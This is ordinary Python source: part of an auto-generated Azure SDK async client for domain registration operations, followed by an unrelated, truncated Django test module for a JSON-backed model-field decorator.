) -> AsyncIterable["_models.NameIdentifierCollection"]:
"""Get domain name recommendations based on keywords.
Description for Get domain name recommendations based on keywords.
:param parameters: Search parameters for domain name recommendations.
:type parameters: ~azure.mgmt.web.v2020_09_01.models.DomainRecommendationSearchParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NameIdentifierCollection or the result of
cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.web.v2020_09_01.models.NameIdentifierCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
cls = kwargs.pop('cls', None) # type: ClsType["_models.NameIdentifierCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
_json = self._serialize.body(parameters, 'DomainRecommendationSearchParameters')
request = build_list_recommendations_request(
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=self.list_recommendations.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
_json = self._serialize.body(parameters, 'DomainRecommendationSearchParameters')
request = build_list_recommendations_request(
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("NameIdentifierCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_recommendations.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/listDomainRecommendations'} # type: ignore
@distributed_trace
def list_by_resource_group(
self,
resource_group_name: str,
**kwargs: Any
) -> AsyncIterable["_models.DomainCollection"]:
"""Get all domains in a resource group.
Description for Get all domains in a resource group.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either DomainCollection or the result of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.web.v2020_09_01.models.DomainCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DomainCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_by_resource_group_request(
resource_group_name=resource_group_name,
subscription_id=self._config.subscription_id,
template_url=self.list_by_resource_group.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_by_resource_group_request(
resource_group_name=resource_group_name,
subscription_id=self._config.subscription_id,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("DomainCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains'} # type: ignore
@distributed_trace_async
async def get(
self,
resource_group_name: str,
domain_name: str,
**kwargs: Any
) -> "_models.Domain":
"""Get a domain.
Description for Get a domain.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param domain_name: Name of the domain.
:type domain_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Domain, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.Domain
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Domain"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
subscription_id=self._config.subscription_id,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Domain', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
domain_name: str,
domain: "_models.Domain",
**kwargs: Any
) -> "_models.Domain":
cls = kwargs.pop('cls', None) # type: ClsType["_models.Domain"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(domain, 'Domain')
request = build_create_or_update_request_initial(
resource_group_name=resource_group_name,
domain_name=domain_name,
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=self._create_or_update_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('Domain', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('Domain', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}'} # type: ignore
@distributed_trace_async
async def begin_create_or_update(
self,
resource_group_name: str,
domain_name: str,
domain: "_models.Domain",
**kwargs: Any
) -> AsyncLROPoller["_models.Domain"]:
"""Creates or updates a domain.
Description for Creates or updates a domain.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param domain_name: Name of the domain.
:type domain_name: str
:param domain: Domain registration information.
:type domain: ~azure.mgmt.web.v2020_09_01.models.Domain
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either Domain or the result of
cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.web.v2020_09_01.models.Domain]
:raises: ~azure.core.exceptions.HttpResponseError
"""
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.Domain"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
domain_name=domain_name,
domain=domain,
content_type=content_type,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('Domain', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}'} # type: ignore
@distributed_trace_async
async def delete(
self,
resource_group_name: str,
domain_name: str,
force_hard_delete_domain: Optional[bool] = None,
**kwargs: Any
) -> None:
"""Delete a domain.
Description for Delete a domain.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param domain_name: Name of the domain.
:type domain_name: str
:param force_hard_delete_domain: Specify :code:`true` to delete the domain
 immediately. The default is :code:`false`, which deletes the domain after 24 hours.
:type force_hard_delete_domain: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_delete_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
subscription_id=self._config.subscription_id,
force_hard_delete_domain=force_hard_delete_domain,
template_url=self.delete.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}'} # type: ignore
@distributed_trace_async
async def update(
self,
resource_group_name: str,
domain_name: str,
domain: "_models.DomainPatchResource",
**kwargs: Any
) -> "_models.Domain":
"""Creates or updates a domain.
Description for Creates or updates a domain.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param domain_name: Name of the domain.
:type domain_name: str
:param domain: Domain registration information.
:type domain: ~azure.mgmt.web.v2020_09_01.models.DomainPatchResource
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Domain, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.Domain
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Domain"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(domain, 'DomainPatchResource')
request = build_update_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=self.update.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('Domain', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('Domain', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}'} # type: ignore
@distributed_trace
def list_ownership_identifiers(
self,
resource_group_name: str,
domain_name: str,
**kwargs: Any
) -> AsyncIterable["_models.DomainOwnershipIdentifierCollection"]:
"""Lists domain ownership identifiers.
Description for Lists domain ownership identifiers.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param domain_name: Name of domain.
:type domain_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either DomainOwnershipIdentifierCollection or the result
of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.web.v2020_09_01.models.DomainOwnershipIdentifierCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DomainOwnershipIdentifierCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_ownership_identifiers_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
subscription_id=self._config.subscription_id,
template_url=self.list_ownership_identifiers.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_ownership_identifiers_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
subscription_id=self._config.subscription_id,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("DomainOwnershipIdentifierCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_ownership_identifiers.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}/domainOwnershipIdentifiers'} # type: ignore
@distributed_trace_async
async def get_ownership_identifier(
self,
resource_group_name: str,
domain_name: str,
name: str,
**kwargs: Any
) -> "_models.DomainOwnershipIdentifier":
"""Get ownership identifier for domain.
Description for Get ownership identifier for domain.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param domain_name: Name of domain.
:type domain_name: str
:param name: Name of identifier.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DomainOwnershipIdentifier, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.DomainOwnershipIdentifier
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DomainOwnershipIdentifier"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_ownership_identifier_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
name=name,
subscription_id=self._config.subscription_id,
template_url=self.get_ownership_identifier.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('DomainOwnershipIdentifier', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_ownership_identifier.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}/domainOwnershipIdentifiers/{name}'} # type: ignore
@distributed_trace_async
async def create_or_update_ownership_identifier(
self,
resource_group_name: str,
domain_name: str,
name: str,
domain_ownership_identifier: "_models.DomainOwnershipIdentifier",
**kwargs: Any
) -> "_models.DomainOwnershipIdentifier":
"""Creates an ownership identifier for a domain or updates identifier details for an existing
identifier.
Description for Creates an ownership identifier for a domain or updates identifier details for
an existing identifier.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param domain_name: Name of domain.
:type domain_name: str
:param name: Name of identifier.
:type name: str
:param domain_ownership_identifier: A JSON representation of the domain ownership properties.
:type domain_ownership_identifier: ~azure.mgmt.web.v2020_09_01.models.DomainOwnershipIdentifier
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DomainOwnershipIdentifier, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.DomainOwnershipIdentifier
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DomainOwnershipIdentifier"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(domain_ownership_identifier, 'DomainOwnershipIdentifier')
request = build_create_or_update_ownership_identifier_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
name=name,
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=self.create_or_update_ownership_identifier.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('DomainOwnershipIdentifier', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update_ownership_identifier.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}/domainOwnershipIdentifiers/{name}'} # type: ignore
@distributed_trace_async
async def delete_ownership_identifier(
self,
resource_group_name: str,
domain_name: str,
name: str,
**kwargs: Any
) -> None:
"""Delete ownership identifier for domain.
Description for Delete ownership identifier for domain.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param domain_name: Name of domain.
:type domain_name: str
:param name: Name of identifier.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_delete_ownership_identifier_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
name=name,
subscription_id=self._config.subscription_id,
template_url=self.delete_ownership_identifier.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete_ownership_identifier.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}/domainOwnershipIdentifiers/{name}'} # type: ignore
@distributed_trace_async
async def update_ownership_identifier(
self,
resource_group_name: str,
domain_name: str,
name: str,
domain_ownership_identifier: "_models.DomainOwnershipIdentifier",
**kwargs: Any
) -> "_models.DomainOwnershipIdentifier":
"""Creates an ownership identifier for a domain or updates identifier details for an existing
identifier.
Description for Creates an ownership identifier for a domain or updates identifier details for
an existing identifier.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param domain_name: Name of domain.
:type domain_name: str
:param name: Name of identifier.
:type name: str
:param domain_ownership_identifier: A JSON representation of the domain ownership properties.
:type domain_ownership_identifier: ~azure.mgmt.web.v2020_09_01.models.DomainOwnershipIdentifier
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DomainOwnershipIdentifier, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.DomainOwnershipIdentifier
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DomainOwnershipIdentifier"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(domain_ownership_identifier, 'DomainOwnershipIdentifier')
request = build_update_ownership_identifier_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
name=name,
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=self.update_ownership_identifier.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('DomainOwnershipIdentifier', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_ownership_identifier.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}/domainOwnershipIdentifiers/{name}'} # type: ignore
@distributed_trace_async
async def renew(
self,
resource_group_name: str,
domain_name: str,
**kwargs: Any
) -> None:
"""Renew a domain.
Description for Renew a domain.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param domain_name: Name of the domain.
:type domain_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_renew_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
subscription_id=self._config.subscription_id,
template_url=self.renew.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
renew.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}/renew'} # type: ignore
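# A minimal usage sketch (illustrative only, not generated code): these operations
# are normally reached through the async service client for this API version.
# Assumes azure-identity is installed; the subscription ID is a placeholder.
async def _example_domains_usage(subscription_id: str) -> None:
    from azure.identity.aio import DefaultAzureCredential
    from azure.mgmt.web.v2020_09_01.aio import WebSiteManagementClient

    async with DefaultAzureCredential() as credential:
        async with WebSiteManagementClient(credential, subscription_id) as client:
            # Check whether a domain can be registered (DomainAvailabilityCheckResult).
            availability = await client.domains.check_availability(
                _models.NameIdentifier(name="example.com"))
            print(availability.available)

            # Page through every domain in the subscription (AsyncItemPaged).
            async for domain in client.domains.list():
                print(domain.name)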
|
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from imp import reload
from django.test import TestCase
from django.db.models import QuerySet
from janyson.decorators import add_fields
from . import models
def add_fields_to_item_model(*args, **kwargs):
if not kwargs.pop('no_reload', False):
reload(models)
add_fields(*args, **kwargs)(models.Item)
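# The helper above is equivalent to decorating the model class directly, e.g.
# (sketch reusing one of the field descriptions defined below):
#
#     @add_fields({'test_num': {'type': 'num'}}, janyson_field='another_janyson')
#     class Item(models.Model):
#         ...
#
# Reloading models first gives each TestCase a clean Item class to decorate.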
TEST_NUM = 10
TEST_STR = 'some text'
TEST_LIST = [1, 3, 5]
TEST_DICT = {'a': 'boo', 'b': 3, 'c': True}
TEST_NUM_DEFAULT = 3
TEST_STR_DEFAULT = 'default text'
TEST_LIST_DEFAULT = [1, 2]
TEST_DICT_DEFAULT = {'foo': 'bar', 'baz': None}
FIELDS_WITHOUT_DEFAULT_VALUES = {
'test_num': {
'type': 'num',
},
'test_str': {
'type': 'str',
},
'test_bool': {
'type': 'bool',
'use_default': False,
'default': False,
},
'test_nullbool': {
'type': 'bool',
'use_default': False,
},
'test_list': {
'type': 'list',
},
'test_dict': {
'type': 'dict',
},
}
FIELDS_WITH_DEFAULT_VALUES = {
'test_num': {
'type': 'num',
'use_default': True,
'default': TEST_NUM_DEFAULT,
},
'test_str': {
'type': 'str',
'use_default': True,
'default': TEST_STR_DEFAULT,
},
'test_bool': {
'type': 'bool',
'use_default': True,
'default': False,
},
'test_nullbool': {
'type': 'bool',
'use_default': True,
},
'test_list': {
'type': 'list',
'use_default': True,
'default': TEST_LIST_DEFAULT,
},
'test_dict': {
'type': 'dict',
'use_default': True,
'default': TEST_DICT_DEFAULT,
},
}
FIELDS_FK = {
'fk_instance': {
'type': 'fk',
'model': 'tests.Tag',
'use_instance': True,
},
'fk_no_instance': {
'type': 'fk',
'model': models.Tag,
'use_instance': False,
},
}
FIELDS_M2M = {
'm2m_instance': {
'type': 'm2m',
'model': 'tests.Tag',
'use_instance': True,
},
'm2m_no_instance': {
'type': 'm2m',
'model': models.Tag,
'use_instance': False,
},
}
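# As exercised by the relation test cases below: with 'use_instance': True the
# attribute reads back as model instances (a Tag instance / a Tag QuerySet),
# while with 'use_instance': False it stays as raw primary keys (an int / a
# list of ints).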
FIELDS_DIR_HIDE_DEFAULT = {
'test_default_hide': {
'type': 'str',
'use_default': True,
'default': TEST_STR_DEFAULT,
'dir_hide': True,
},
'test_default_no_hide': {
'type': 'str',
'use_default': True,
'default': TEST_STR_DEFAULT,
'dir_hide': False,
},
}
FIELDS_DIR_HIDE_NO_DEFAULT = {
'test_no_default_hide': {
'type': 'str',
'use_default': False,
'dir_hide': True,
},
'test_no_default_no_hide': {
'type': 'str',
'use_default': False,
'dir_hide': False,
},
}
COMMON_FIELD_OPTIONS = {
'type': 'str',
'use_default': True,
'default': TEST_STR_DEFAULT,
}
COMMON_FIELDS_OVERRIDE = {
'str1': {},
'str2': {
'use_default': False,
},
'num': {
'type': 'num',
'default': TEST_NUM_DEFAULT
}
}
class StoredValuesTestCase(TestCase):
JANYSON_FIELD = None
@classmethod
def setUpClass(cls):
super(StoredValuesTestCase, cls).setUpClass()
kwargs = {}
if cls.JANYSON_FIELD:
kwargs['janyson_field'] = cls.JANYSON_FIELD
add_fields_to_item_model(FIELDS_WITHOUT_DEFAULT_VALUES, **kwargs)
item = models.Item.objects.create(name='stored_values')
item.test_num = TEST_NUM
item.test_str = TEST_STR
item.test_bool = True
item.test_nullbool = True
item.test_list = TEST_LIST
item.test_dict = TEST_DICT
item.save()
cls.item_pk = item.pk
def setUp(self):
self.item = models.Item.objects.get(pk=self.item_pk)
def test_num_stored_value(self):
self.assertEqual(self.item.test_num, TEST_NUM)
def test_str_stored_value(self):
self.assertEqual(self.item.test_str, TEST_STR)
def test_bool_stored_value(self):
self.assertIs(self.item.test_bool, True)
def test_nullbool_stored_value(self):
self.assertIs(self.item.test_nullbool, True)
def test_list_stored_value(self):
self.assertListEqual(self.item.test_list, TEST_LIST)
def test_dict_stored_value(self):
self.assertDictEqual(self.item.test_dict, TEST_DICT)
class StoredValuesInAnotherJanySONFieldTestCase(StoredValuesTestCase):
JANYSON_FIELD = 'another_janyson'
class DefaultValuesTestCase(TestCase):
@classmethod
def setUpClass(cls):
super(DefaultValuesTestCase, cls).setUpClass()
add_fields_to_item_model(FIELDS_WITH_DEFAULT_VALUES)
item = models.Item.objects.create(name='default_values')
cls.item_pk = item.pk
def setUp(self):
self.item = models.Item.objects.get(pk=self.item_pk)
def test_num_default_value(self):
self.assertEqual(self.item.test_num, TEST_NUM_DEFAULT)
def test_str_default_value(self):
self.assertEqual(self.item.test_str, TEST_STR_DEFAULT)
def test_bool_default_value(self):
self.assertIs(self.item.test_bool, False)
def test_nullbool_default_value(self):
self.assertIsNone(self.item.test_nullbool)
def test_list_default_value(self):
self.assertListEqual(self.item.test_list, TEST_LIST_DEFAULT)
def test_dict_default_value(self):
self.assertDictEqual(self.item.test_dict, TEST_DICT_DEFAULT)
class NoDefaultValuesTestCase(TestCase):
@classmethod
def setUpClass(cls):
super(NoDefaultValuesTestCase, cls).setUpClass()
add_fields_to_item_model(FIELDS_WITHOUT_DEFAULT_VALUES)
item = models.Item.objects.create(name='no_default_values')
cls.item_pk = item.pk
def setUp(self):
